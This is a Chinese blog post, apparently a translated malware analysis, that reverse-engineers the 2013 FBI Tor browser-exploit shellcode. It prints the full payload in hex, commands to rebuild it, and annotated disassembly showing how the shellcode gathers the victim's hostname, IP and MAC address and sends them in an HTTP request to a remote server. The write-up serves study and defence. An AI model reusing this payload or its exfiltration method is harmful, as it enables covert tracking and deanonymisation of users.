盒子
盒子
文章目录
  1. 逆向之
    1. 漏洞挖掘程序
    2. 位置独立代码
    3. 定位Windows API
  2. 开始

FBI Tor Malware Analysis(意译整理)

感想:

先说说,逆向真累,得一点点跟着函数流前进探索。靠反汇编引擎可不靠谱,跟着流程才是王道啊。

注释真是非常重要,为何要用IDA真是一目了然啊

来源:

  • Analysis of the FBI Tor Malware
  • Virustotal
  • Freedom Hosting FBI Shellcode Payload..
  • Re:”Remembering ‘08” Remembering Tor
  • redirector
  • infector
  • shellcode

Tor是一个让人们不被追踪地浏览网页和获取服务的匿名网络。作为这个网络的一部分,存在所谓的“暗网”。这些网络只能通过Tor连接。虽然很多服务是无辜的或者抵制人权滥用,网络的匿名性也吸引了有目的的犯罪比如儿童色情。法律机构无法#Hidden_services)追踪到源IP地址。

2013年,在Freedom Hosting的暗网服务器上发现了一个恶意程序,该程序挖掘特定浏览器的漏洞并在用户计算机上执行程序。该程序搜集用户信息并发送到Virginia的服务器,然后使浏览器崩溃。它没有明显的恶意程序特征。因此有猜测这个程序是在Virginia有办公室的的FBI制作的。FBI有权编写恶意程序。看起来这个猜测是真的。现在已经确认为FBI代号为 EgotisticalGiraffe的作品。

逆向之

漏洞挖掘程序

漏洞挖掘程序是javascript写的,挖掘了一个特定版本firefox的已知bug。挖掘程序经过充分混淆但是快速扫描能找到很长的16进制字符串,在前几个字符能明显看到操作符(通常在shellcode开头有jmp或者call,知道这一点就很容易找到shellcode了)。

首先,攻击者在网页中嵌入了一个链接向恶意页面的iframe,将受害者定向到感染页面。参见这里Freedom Hosting FBI IFRAME Redirector Malware Script。

在受害者被重定向到真正的感染页面后,在三个iframe之间执行js,进一步混淆执行流程。最终触发漏洞,注入shellcode。参见Freedom Hosting FBI Malware Infector (ForPayload) JavaScript

js那部分就不说了,我们看看shellcode。

位置独立代码

shellcode必须直接注入进程运行。它不知道自己会被注入到什么位置,也不知道Windows API函数的地址。

因此,必须想些办法获取这些信息。FBI的这个程序使用了一个找到地址的常用方法:

call start
start:
pop ebp

call start做了两件事,首先,把下一个要执行的指令的地址即pop ebp的地址压入栈,然后跳转到start标签位置,就是继续执行pop ebp。再执行完pop ebp后,pop ebp的地址就存入了ebp寄存器。以此为标准就能获取shellcode中的其它数据。

定位Windows API

译者:啊啊啊啊啊,都忘记这部分怎么回事了。大家可以看看

应用程序知道Windows载入的API在哪里,但shellcode不会知道。常见方法是查看fs寄存器指向的线程信息块(TIB).通过这个结构可以定位宿主程序DLL函数的位置,遍历DLL导出表知道找到函数。此过程非常无聊,所以FBI都使用了Metasploit项目Stephen Fewer的函数解析器。

push arguments
...
push FUNCTIONHASH
call Stephen的解析器

函数哈希通过对函数名简单的哈希算法实现,你可以用别人做好的哈希表,可以用别人的哈希计算程序,甚至自己在shellcode中计算。

开始

首先先获取shellcode吧,把以下一堆hex保存到input.txt

60FCE88A0000006089E531D2648B52308B520C8B52148B72280FB74A2631FF31C0AC3C617C022C20C1CF0D01C7E2F052578B52108B423C01D08B407885C0744A01D0508B48188B582001D3E33C498B348B01D631FF31C0ACC1CF0D01C738E075F4037DF83B7D2475E2588B582401D3668B0C4B8B581C01D38B048B01D0894424245B5B61595A51FFE0585F5A8B12EB86055D81BDE90200004745542075708D85D102000050684C772607FFD585C0745E8D85D802000050684C772607FFD585C0744CBB9001000029DC54536829806B00FFD501DC85C07536505050504050405068EA0FDFE0FFD531DBF7D339C3741F89C36A108DB5E102000056536899A57461FFD585C0741FFE8D8900000075E380BD4F020000017407E83B010000EB05E84D010000FFE7B80001000029C489E252505268B649DE01FFD55F81C40001000085C00F85F200000057E8F90000005E89CA8DBDE9020000E8EB0000004F83FA207C05BA2000000089D156F3A4B90D0000008DB5C4020000F3A489BD4B0200005E5668A9283480FFD585C00F84AA000000668B480A6683F9040F829C0000008D400C8B008B088B09B8000100005089E729C489E657565151684872D2B8FFD585C081C4040100000FB70F83F906726CB906000000B81000000029C489E789CAD1E2505231D28A1688D024F0C0E8043C0977040430EB02043788074788D0240F3C0977040430EB02043788074746E2D45929CF89FE5801C48BBD4B020000F3A4C6854F02000001E82E00000031C0505129CF4F575368C2EB385FFFD55368756E4D61FFD5E9C8FEFFFF31C9F7D131C0F2AEF7D149C300000000008DBDE9020000E8E4FFFFFF4FB94F0000008DB575020000F3A48DBDE9020000E8CBFFFFFFC30D0A436F6E6E656374696F6E3A206B6565702D616C6976650D0A4163636570743A202A2F2A0D0A4163636570742D456E636F64696E673A20677A69700D0A0D0A0083C70E31C9F7D131C0F3AE4FFFE70D0A436F6F6B69653A2049443D7773325F3332004950484C50415049000200005041DECA36474554202F30356365613464652D393531642D343033372D626638662D66363930353562323739626220485454502F312E310D0A486F73743A200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000090

然后使用xxd转化为二进制文件。

$ xxd -r -p hex_input.txt magneto.payload.shellcode
$ ls -al magneto.payload.shellcode
-rw-r--r-- 1 reverland reverland 956 Aug 14 19:29 magneto.payload.shellcode
$ sha256sum magneto.payload.shellcode
74414c3397dc0de10fbe0adedb7f033028fe4bb57ac4f51784a6df1a7b0114f0  magneto.payload.shellcode

首先反汇编shellcode:

 ~/Work/project/reverse/testr2 -b 32 -k w32 -a x86 magneto.payload.shellcode
 -- Everything up-to-date.
[0x00000000]> pD 956
            0x00000000    60           pushad
            0x00000001    fc           cld
            0x00000002    e88a000000   call 0x91
               0x00000091(unk)
            0x00000007    60           pushad
            0x00000008    89e5         mov ebp, esp
            0x0000000a    31d2         xor edx, edx
            0x0000000c    648b5230     mov edx, [fs:edx+0x30]
            0x00000010    8b520c       mov edx, [edx+0xc]
            0x00000013    8b5214       mov edx, [edx+0x14]
   .------> 0x00000016    8b7228       mov esi, [edx+0x28]
   |        0x00000019    0fb74a26     movzx ecx, word [edx+0x26]
   |        0x0000001d    31ff         xor edi, edi
   |   .--> 0x0000001f    31c0         xor eax, eax
   |   |    0x00000021    ac           lodsb
   |   |    0x00000022    3c61         cmp al, 0x61
   |   |,=< 0x00000024    7c02         jl 0x28
   |   ||   0x00000026    2c20         sub al, 0x20
   |   |`-> 0x00000028    c1cf0d       ror edi, 0xd
   |   |    0x0000002b    01c7         add edi, eax
   |   `==< 0x0000002d    e2f0         loop 0x1f
   |        0x0000002f    52           push edx
   |        0x00000030    57           push edi
   |        0x00000031    8b5210       mov edx, [edx+0x10]
   |        0x00000034    8b423c       mov eax, [edx+0x3c]
   |        0x00000037    01d0         add eax, edx
   |        0x00000039    8b4078       mov eax, [eax+0x78]
   |        0x0000003c    85c0         test eax, eax
   |  ,===< 0x0000003e    744a         je 0x8a
   |  |     0x00000040    01d0         add eax, edx
   |  |     0x00000042    50           push eax
   |  |     0x00000043    8b4818       mov ecx, [eax+0x18]
   |  |     0x00000046    8b5820       mov ebx, [eax+0x20]
   |  |     0x00000049    01d3         add ebx, edx
   |.-----> 0x0000004b    e33c         jecxz 0x89
   || |     0x0000004d    49           dec ecx
   || |     0x0000004e    8b348b       mov esi, [ebx+ecx*4]
   || |     0x00000051    01d6         add esi, edx
   || |     0x00000053    31ff         xor edi, edi
   ||.----> 0x00000055    31c0         xor eax, eax
   ||||     0x00000057    ac           lodsb
   ||||     0x00000058    c1cf0d       ror edi, 0xd
   ||||     0x0000005b    01c7         add edi, eax
   ||||     0x0000005d    38e0         cmp al, ah
   ||`====< 0x0000005f    75f4         jne 0x55
   || |     0x00000061    037df8       add edi, [ebp-0x8]
   || |     0x00000064    3b7d24       cmp edi, [ebp+0x24]
   |`=====< 0x00000067    75e2         jne 0x4b
   |  |     0x00000069    58           pop eax
   |  |     0x0000006a    8b5824       mov ebx, [eax+0x24]
   |  |     0x0000006d    01d3         add ebx, edx
   |  |     0x0000006f    668b0c4b     mov cx, [ebx+ecx*2]
   |  |     0x00000073    8b581c       mov ebx, [eax+0x1c]
   |  |     0x00000076    01d3         add ebx, edx
   |  |     0x00000078    8b048b       mov eax, [ebx+ecx*4]
   |  |     0x0000007b    01d0         add eax, edx
   |  |     0x0000007d    89442424     mov [esp+0x24], eax
   |  |     0x00000081    5b           pop ebx
   |  |     0x00000082    5b           pop ebx
   |  |     0x00000083    61           popad
   |  |     0x00000084    59           pop ecx
   |  |     0x00000085    5a           pop edx
   |  |     0x00000086    51           push ecx
   |  |     0x00000087    ffe0         jmp eax
   |  |     0x00000089    58           pop eax
   |  `---> 0x0000008a    5f           pop edi
   |        0x0000008b    5a           pop edx
   |        0x0000008c    8b12         mov edx, [edx]
   `======< 0x0000008e    eb86         jmp 0x16

首先

pushad
cld

将寄存器内容保存在堆栈上并清空寄存器内容。

然后可以看到从0x00000002调用0x00000091。那从0x00000007开始是啥?参考之前stephen的函数解析器,一直到0x0000008e都是解析器。唉?0x90是啥?到0x00000091开始:

[0x00000000]> pD @0x91
            0x00000091    5d           pop ebp
            0x00000092    81bde902000. cmp dword [ebp+0x2e9], 0x20544547
        ,=< 0x0000009c    7570         jne 0x10e
        |   0x0000009e    8d85d1020000 lea eax, [ebp+0x2d1]
        |   0x000000a4    50           push eax
        |   0x000000a5    684c772607   push 0x726774c ;  0x0726774c 
        |   0x000000aa    ffd5         call ebp
        |      0x00000000(unk, unk, unk, unk, unk, unk, unk, unk)
        |   0x000000ac    85c0         test eax, eax
       ,==< 0x000000ae    745e         je 0x10e
       ||   0x000000b0    8d85d8020000 lea eax, [ebp+0x2d8]
       ||   0x000000b6    50           push eax
       ||   0x000000b7    684c772607   push 0x726774c ;  0x0726774c 
       ||   0x000000bc    ffd5         call ebp
       ||      0x00000000(unk, unk)
       ||   0x000000be    85c0         test eax, eax
      ,===< 0x000000c0    744c         je 0x10e
      |||   0x000000c2    bb90010000   mov ebx, 0x190 ;  0x00000190 
      |||   0x000000c7    29dc         sub esp, ebx
      |||   0x000000c9    54           push esp
      |||   0x000000ca    53           push ebx
      |||   0x000000cb    6829806b00   push 0x6b8029 ;  0x006b8029 
      |||   0x000000d0    ffd5         call ebp
      |||      0x00000000(unk, unk, unk)
      |||   0x000000d2    01dc         add esp, ebx
      |||   0x000000d4    85c0         test eax, eax
     ,====< 0x000000d6    7536         jne 0x10e
     ||||   0x000000d8    50           push eax
     ||||   0x000000d9    50           push eax
     ||||   0x000000da    50           push eax
     ||||   0x000000db    50           push eax
     ||||   0x000000dc    40           inc eax
     ||||   0x000000dd    50           push eax
     ||||   0x000000de    40           inc eax
     ||||   0x000000df    50           push eax
     ||||   0x000000e0    68ea0fdfe0   push 0xe0df0fea ;  0xe0df0fea 
     ||||   0x000000e5    ffd5         call ebp
     ||||      0x00000000(unk, unk, unk, unk, unk, unk, unk)
     ||||   0x000000e7    31db         xor ebx, ebx
     ||||   0x000000e9    f7d3         not ebx
     ||||   0x000000eb    39c3         cmp ebx, eax
    ,=====< 0x000000ed    741f         je 0x10e
    |||||   0x000000ef    89c3         mov ebx, eax
  .-------> 0x000000f1    6a10         push 0x10 ;  0x00000010 
  | |||||   0x000000f3    8db5e1020000 lea esi, [ebp+0x2e1]
  | |||||   0x000000f9    56           push esi
  | |||||   0x000000fa    53           push ebx
  | |||||   0x000000fb    6899a57461   push 0x6174a599 ;  0x6174a599 
  | |||||   0x00000100    ffd5         call ebp
  | |||||      0x00000000(unk, unk, unk, unk)
  | |||||   0x00000102    85c0         test eax, eax
  |,======< 0x00000104    741f         je 0x125
  |||||||   0x00000106    fe8d89000000 dec byte [ebp+0x89]
  `=======< 0x0000010c    75e3         jne 0xf1
   |`````-> 0x0000010e    80bd4f02000. cmp byte [ebp+0x24f], 0x1
  ========< 0x00000115    7407         je 0x11e
   |        0x00000117    e83b010000   call 0x257
   |           0x00000257()
  ========< 0x0000011c    eb05         jmp 0x123
  --------> 0x0000011e    e84d010000   call 0x270
          >    0x00000270()
  --------> 0x00000123    ffe7         jmp edi
   `------> 0x00000125    b800010000   mov eax, 0x100 ;  0x00000100 
            0x0000012a    29c4         sub esp, eax
            0x0000012c    89e2         mov edx, esp
            0x0000012e    52           push edx
            0x0000012f    50           push eax
            0x00000130    52           push edx
            0x00000131    68b649de01   push 0x1de49b6 ;  0x01de49b6 
            0x00000136    ffd5         call ebp
               0x00000000(unk, unk, unk, unk)
            0x00000138    5f           pop edi
            0x00000139    81c400010000 add esp, 0x100
            0x0000013f    85c0         test eax, eax
  ========< 0x00000141    0f85f2000000 jne 0x239
            0x00000147    57           push edi
            0x00000148    e8f9000000   call 0x246
               0x00000246(unk)
            0x0000014d    5e           pop esi
            0x0000014e    89ca         mov edx, ecx
            0x00000150    8dbde9020000 lea edi, [ebp+0x2e9]
            0x00000156    e8eb000000   call 0x246
               0x00000246()
            0x0000015b    4f           dec edi
            0x0000015c    83fa20       cmp edx, 0x20
  ========< 0x0000015f    7c05         jl 0x166
            0x00000161    ba20000000   mov edx, 0x20 ;  0x00000020 
  --------> 0x00000166    89d1         mov ecx, edx
            0x00000168    56           push esi
            0x00000169    f3a4         rep movsb
            0x0000016b    b90d000000   mov ecx, 0xd ;  0x0000000d 
            0x00000170    8db5c4020000 lea esi, [ebp+0x2c4]
            0x00000176    f3a4         rep movsb
            0x00000178    89bd4b020000 mov [ebp+0x24b], edi
            0x0000017e    5e           pop esi
            0x0000017f    56           push esi
            0x00000180    68a9283480   push 0x803428a9 ;  0x803428a9 
            0x00000185    ffd5         call ebp

首先pop ebp将解析器的地址弹入ebpebp就指向了所有解析器,显然,之后的一些长十六机制书就是windows API函数的哈希了。我们查查表、跟跟执行流程、看看四处的数据,做做注释,就知道大致怎么回事了。

[0x00000000]> ps @0x00000007+0x2e9
GET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1\x0d
Host:
[0x00000000]> ps @0x00000007+0x2d1
ws2_32
[0x00000000]> ps @0x00000007+0x2d8
IPHLPAPI

当看到一大堆往0x0000010e的类似跳转,猜测大概是处理出错的函数吧,可以注释之。

在函数调用之前(0x0000092)还有个自检查

cmp dword [ebp+0x2e9], 0x20544547
jne 0x10e

我们可以看到是看ebp+0x2e9指向的是不是以GET开头:

~ ⮀ print "\x20\x54\x45\x47"
TEG

最后获得的是一个标准的shellcode建立socket流程:

  1. 通过kernel.dll!LoadlibraryA载入相应dll(ws2_32),这里还载入了IPHLPAPI
  2. ws2_32.dll!WSAStartup初始化socket
  3. ws2_32.dll!WSASocketA建立socket
  4. ws2_32.dll!connect连接socket

connect返回0时说明连接成功,那么可以知道0x00000104地方的je 0x125跳往的地方应该就是连接成功后要执行的位置了。可以注释下。

注意之后的

0x00000106    fe8d89000000 dec byte [ebp+0x89]
0x0000010c    75e3         jne 0xf1

ebp+0x89=0x90,这也是我发现不知道是什么的一个字节。根据紧随其后的一个跳转来看,是一个计数器,看样子是尝试连接5次

[0x00000090]> px 1@0x7+0x89
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x00000090  05

如果5次connect都失败了,没有跳转到0x125, 就到了0x10e,就是我们猜测是错误处理的部分。

[0x00000256]> pd 10@0x10e
           0x0000010e    80bd4f02000. cmp byte [ebp+0x24f], 0x1
       ,=< 0x00000115    7407         je 0x11e
       |   0x00000117    e83b010000   call 0x257
       |      0x00000257()
      ,==< 0x0000011c    eb05         jmp 0x123
      |`-> 0x0000011e    e84d010000   call 0x270
      || >    0x00000270()
      `--> 0x00000123    ffe7         jmp edi
           0x00000125    b800010000   mov eax, 0x100 ;  0x00000100 
           0x0000012a    29c4         sub esp, eax
           0x0000012c    89e2         mov edx, esp
           0x0000012e    52           push edx

0x256的字节和1做比较,相等则调用0x270再执行0x123,否则调用0x257然后再跳到0x123

不知道判断了什么。

我们先看看0x257

[0x00000000]> pd 10@0x257
           0x00000257    8dbde9020000 lea edi, [ebp+0x2e9]
           0x0000025d    e8e4ffffff   call 0x246

载入0x7+0x2e9然后调用0x246

[0x00000000]> ps @0x7+0x2e9
GET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1\x0d
Host: 

[0x00000000]> pd 10@0x246
           0x00000246    31c9         xor ecx, ecx
           0x00000248    f7d1         not ecx
           0x0000024a    31c0         xor eax, eax
           0x0000024c    f2ae         repne scasb
           0x0000024e    f7d1         not ecx
           0x00000250    49           dec ecx
           0x00000251    c3           ret

0x246,中repne scasb常常用来计算字符串长度。仔细看其实0x246就是strlen。计算结果在ecx中,edi此时指向字符串\0下一个字节。

所以回到0x257:

[0x00000000]> pd 10@0x257
           0x00000257    8dbde9020000 lea edi, [ebp+0x2e9]
           0x0000025d    e8e4ffffff   call 0x246
              0x00000246()
           0x00000262    4f           dec edi
           0x00000263    b94f000000   mov ecx, 0x4f ;  0x0000004f 
           0x00000268    8db575020000 lea esi, [ebp+0x275]
           0x0000026e    f3a4         rep movsb
           0x00000270    8dbde9020000 lea edi, [ebp+0x2e9]
           0x00000276    e8cbffffff   call 0x246
              0x00000246()
           0x0000027b    c3           ret

首先edi减1指向字符串\0位置。

[0x00000000]> ps @0x7+0x275
\x0d
Connection: keep-alive\x0d
Accept: */*\x0d
Accept-Encoding: gzip\x0d
\x0d

将两个字符串结合起来了。shellcode改变了自己,可以通过ebp+0x2e9获得新的HTTP报头.

难道标志位不相等就构造报头?然后跳转到报头后下一位,我们稍微计算下发现跳转到一堆00上,崩掉了……

[0x00000000]> y 0x4f @0x7+0x275
[0x00000000]> e io.cache=true
[0x00000000]> yy 0x32a
[0x00000000]> px @0x32a
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x0000032a  0d0a 436f 6e6e 6563 7469 6f6e 3a20 6b65  ..Connection: ke
0x0000033a  6570 2d61 6c69 7665 0d0a 4163 6365 7074  ep-alive..Accept
0x0000034a  3a20 2a2f 2a0d 0a41 6363 6570 742d 456e  : */*..Accept-En
0x0000035a  636f 6469 6e67 3a20 677a 6970 0d0a 0d0a  coding: gzip....
0x0000036a  0083 c70e 31c9 f7d1 31c0 f3ae 4fff e700  ....1...1...O...
0x0000037a  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x0000038a  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x0000039a  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x000003aa  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x000003ba  0090 ffff ffff ffff ffff ffff ffff ffff  ................

回到0x10e,我们再看看0x270, 标志位为1发生什么。

[0x00000000]>  pd 3@0x270
           0x00000270    8dbde9020000 lea edi, [ebp+0x2e9]
           0x00000276    e8cbffffff   call 0x246
              0x00000246()
           0x0000027b    c3           ret


[0x00000000]>  pd 6@0x10e
           0x0000010e    80bd4f02000. cmp byte [ebp+0x24f], 0x1
       ,=< 0x00000115    7407         je 0x11e
       |   0x00000117    e83b010000   call 0x257
       |      0x00000257(unk)
      ,==< 0x0000011c    eb05         jmp 0x123
      |`-> 0x0000011e    e84d010000   call 0x270
      || >    0x00000270()
      `--> 0x00000123    ffe7         jmp edi


[0x00000000]> pd 10@0x270
           0x00000270    8dbde9020000 lea edi, [ebp+0x2e9]
           0x00000276    e8cbffffff   call 0x246
              0x00000246()
           0x0000027b    c3           ret

What?计算下报头长度,然后直接跳过去崩掉……

反正只要connect失败就崩了……只不过崩之前干的事情不同,不知道ebp+0x24f是判断啥的标志位。

Ok, 如果connect成功连接。

0x00000104    741f         je 0x125

我们可以看到,从0x125就是gethostname了。

[0x00000000]> pd 10 @0x125
           0x00000125    b800010000   mov eax, 0x100 ;  0x00000100 
           0x0000012a    29c4         sub esp, eax
           0x0000012c    89e2         mov edx, esp
           0x0000012e    52           push edx
           0x0000012f    50           push eax
           0x00000130    52           push edx
           0x00000131    68b649de01   push 0x1de49b6 ;  0x01de49b6 
           0x00000136    ffd5         call ebp

exercise ● ⮀ python hash.py ws2_32.dll gethostname
[+] Ran on Sat Aug 16 20:23:44 2014

[+] 0x01DE49B6 = ws2_32.dll!gethostname

gethostname的结果写入edi中,接着判断如果失败跳到0x239去,不知道是啥。

[0x00000000]> pd 10@0x239
       |   0x00000239    53           push ebx
       |   0x0000023a    68756e4d61   push 0x614d6e75 ;  0x614d6e75 
       |   0x0000023f    ffd5         call ebp
       |      0x00000000(unk, unk, unk) ; name

这个hash是"ws2_32.dll!closesocket"那么就很显然是关闭socket的函数了.

我们回到之前gethostname地方:

  ,=< 0x00000141    0f85f2000000 jne 0x239
 |   0x00000147    57           push edi
 |   0x00000148    e8f9000000   call 0x246
 |      0x00000246(unk) ; strlen
 |   0x0000014d    5e           pop esi
 |   0x0000014e    89ca         mov edx, ecx
 |   0x00000150    8dbde9020000 lea edi, [ebp+0x2e9]
 |   0x00000156    e8eb000000   call 0x246
 |      0x00000246() ; strlen
 |   0x0000015b    4f           dec edi
 |   0x0000015c    83fa20       cmp edx, 0x20
,==< 0x0000015f    7c05         jl 0x166

接下来,又是计算字符串长度,判断之前gethostname结果是否等于32,如果比32小则跳转到0x166, 如果大于32则将edx设置成32。而0x166开始又是之前我们分析过的拼接字符串的部分。

[0x00000246]> pd 7@0x166
           0x00000166    89d1         mov ecx, edx
           0x00000168    56           push esi
           0x00000169    f3a4         rep movsb
           0x0000016b    b90d000000   mov ecx, 0xd ;  0x0000000d 
           0x00000170    8db5c4020000 lea esi, [ebp+0x2c4]
           0x00000176    f3a4         rep movsb
           0x00000178    89bd4b020000 mov [ebp+0x24b], edi

就是把gethostname的结果拼接到HOST字段上。

[0x00000246]> ps @0x7+0x2c4
\x0d
Cookie: ID=ws2_32
[0x00000246]> ps @0x7+0x2e9
GET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1\x0d
Host: 

同时gethostname获取的结果保存到堆栈上,最后弹出,调用gethostbyname

[0x00000246]> pd 10@0x179
           0x00000179    bd4b020000   mov ebp, 0x24b ;  0x0000024b 
           0x0000017e    5e           pop esi
           0x0000017f    56           push esi
           0x00000180    68a9283480   push 0x803428a9 ;  0x803428a9 
           0x00000185    ffd5         call ebp
              0x00000000(unk, unk) ; name
           0x00000187    85c0         test eax, eax

% python hash.py ws2_32.dll gethostbyname
[+] Ran on Tue Aug 19 16:16:21 2014

[+] 0x803428A9 = ws2_32.dll!gethostbyname

两次检查结果确认返回了正确的结果,

紧接着,准备数据,调用sendARP获取mac地址

% python hash.py iphlpapi.dll SendARP             
[+] Ran on Tue Aug 19 16:21:37 2014

[+] 0xB8D27248 = iphlpapi.dll!SendARP


  ||   0x0000019d    8d400c       lea eax, [eax+0xc]
  ||   0x000001a0    8b00         mov eax, [eax]
  ||   0x000001a2    8b08         mov ecx, [eax]
  ||   0x000001a4    8b09         mov ecx, [ecx]
  ||   0x000001a6    b800010000   mov eax, 0x100 ;  0x00000100 
  ||   0x000001ab    50           push eax
  ||   0x000001ac    89e7         mov edi, esp
  ||   0x000001ae    29c4         sub esp, eax
  ||   0x000001b0    89e6         mov esi, esp
  ||   0x000001b2    57           push edi
  ||   0x000001b3    56           push esi
  ||   0x000001b4    51           push ecx
  ||   0x000001b5    51           push ecx
  ||   0x000001b6    684872d2b8   push 0xb8d27248 ;  sendARP 
  ||   0x000001bb    ffd5         call ebp

根据msdn上看到的,edi指向mac地址的长度。接下来比较mac地址是否是六个字节,如果不是……我们之前看到了0x239是closesocket

[0x00000000]> pd 10@0x1bf
           0x000001bf    81c404010000 add esp, 0x104
           0x000001c5    0fb70f       movzx ecx, word [edi]
           0x000001c8    83f906       cmp ecx, 0x6
       ,=< 0x000001cb    726c         jb 0x239

接下来这个乍一看让人困惑,在栈上分配空间,还干了一堆不知道干什么的。

[0x00000000]> pd 32@0x1cd
|          0x000001cd    b906000000   mov ecx, 0x6 ;  0x00000006 
|          0x000001d2    b810000000   mov eax, 0x10 ;  0x00000010 
|          0x000001d7    29c4         sub esp, eax
|          0x000001d9    89e7         mov edi, esp
|          0x000001db    89ca         mov edx, ecx
|          0x000001dd    d1e2         shl edx, 1
|          0x000001df    50           push eax
|          0x000001e0    52           push edx
|          ; JMP XREF from 0x0000020b (fcn.00000090)
|  .-----> 0x000001e1    31d2         xor edx, edx
|  |       0x000001e3    8a16         mov dl, [esi]
|  |       0x000001e5    88d0         mov al, dl
|  |       0x000001e7    24f0         and al, 0xf0
|  |       0x000001e9    c0e804       shr al, 0x4
|  |       0x000001ec    3c09         cmp al, 0x9
|  |   ,=< 0x000001ee    7704         ja 0x1f4
|  |   |   0x000001f0    0430         add al, 0x30
|  |  ,==< 0x000001f2    eb02         jmp 0x1f6 ; (fcn.00000090)
|  |  ||   ; JMP XREF from 0x000001ee (fcn.00000090)
|  |  |`-> 0x000001f4    0437         add al, 0x37
|  |  |    ; JMP XREF from 0x000001f2 (fcn.00000090)
|  |  `--> 0x000001f6    8807         mov [edi], al
|  |       0x000001f8    47           inc edi
|  |       0x000001f9    88d0         mov al, dl
|  |       0x000001fb    240f         and al, 0xf
|  |       0x000001fd    3c09         cmp al, 0x9
|  | ,===< 0x000001ff    7704         ja 0x205
|  | |     0x00000201    0430         add al, 0x30
|  |,====< 0x00000203    eb02         jmp 0x207 ; (fcn.00000090)
|  |||     ; JMP XREF from 0x000001ff (fcn.00000090)
|  ||`---> 0x00000205    0437         add al, 0x37
|  ||      ; JMP XREF from 0x00000203 (fcn.00000090)
|  |`----> 0x00000207    8807         mov [edi], al
|  |       0x00000209    47           inc edi
|  |       0x0000020a    46           inc esi
|  `=====< 0x0000020b    e2d4         loop 0x1e1
|          0x0000020d    59           pop ecx

后来看看原来如此

In [9]: chr(10+0x37)
Out[9]: 'A'

In [10]: chr(9+0x30)
Out[10]: '9'

原来是把mac地址转换成可打印字符。

下一步,估计就是放进http报头中发送了。

[0x00000000]> pd 10@0x0000020d
|          0x0000020d    59           pop ecx
|          0x0000020e    29cf         sub edi, ecx
|          0x00000210    89fe         mov esi, edi
|          0x00000212    58           pop eax
|          0x00000213    01c4         add esp, eax
|          0x00000215    8bbd4b020000 mov edi, [ebp+0x24b]
|          0x0000021b    f3a4         rep movsb
|          0x0000021d    c6854f02000. mov byte [ebp+0x24f], 0x1 ;  0x00000001 
|          0x00000224    e82e000000   call 0x257 ; (fcn.00000252)
|             fcn.00000252()
|          0x00000229    31c0         xor eax, eax

果然是,调用0x257拼接报头。

之后,

[0x00000252]> pd 10@0x00000229
|          0x00000229    31c0         xor eax, eax
|          0x0000022b    50           push eax
|          0x0000022c    51           push ecx
|          0x0000022d    29cf         sub edi, ecx
|          0x0000022f    4f           dec edi
|          0x00000230    57           push edi
|          0x00000231    53           push ebx
|          0x00000232    68c2eb385f   push 0x5f38ebc2 ;  ws2_32!send 
|          0x00000237    ffd5         call ebp
|             fcn.00000000(unk, unk, unk, unk, unk)
|          ; JMP XREF from 0x00000141 (fcn.00000090)
|          ; JMP XREF from 0x00000189 (fcn.00000090)
|          ; JMP XREF from 0x00000197 (fcn.00000090)
|          ; JMP XREF from 0x000001cb (fcn.00000090)
|          ;-- closesocket:
|          0x00000239    53           push ebx

显然将报头send出去了。

最后,关闭socket连接。然后跳回0x10e构造报头然后崩溃……

[0x00000252]> pd 10@0x00000239
|      |   ; JMP XREF from 0x00000141 (fcn.00000090)
|      |   ; JMP XREF from 0x00000189 (fcn.00000090)
|      |   ; JMP XREF from 0x00000197 (fcn.00000090)
|      |   ; JMP XREF from 0x000001cb (fcn.00000090)
|      |   ;-- closesocket:
|      |   0x00000239    53           push ebx
|      |   0x0000023a    68756e4d61   push 0x614d6e75 ;  0x614d6e75 
|      |   0x0000023f    ffd5         call ebp
|      |      fcn.00000000(unk, unk, unk)
\      `=< 0x00000241    e9c8feffff   jmp 0x10e ; (fcn.00000090)

至此这个shellcode大致做了什么就比较清晰了。与远程主机建立连接,将计算机的机器名获取,又获取IP地址和MAC地址,然后构造HTTP报头发送给远端的机器。

要更加清晰的知道shellcode在干什么,最好还是动态方式调试下。当然得写个测试shellcode的程序了,好像radare2有调试功能……不会用,唉,标记都用不好。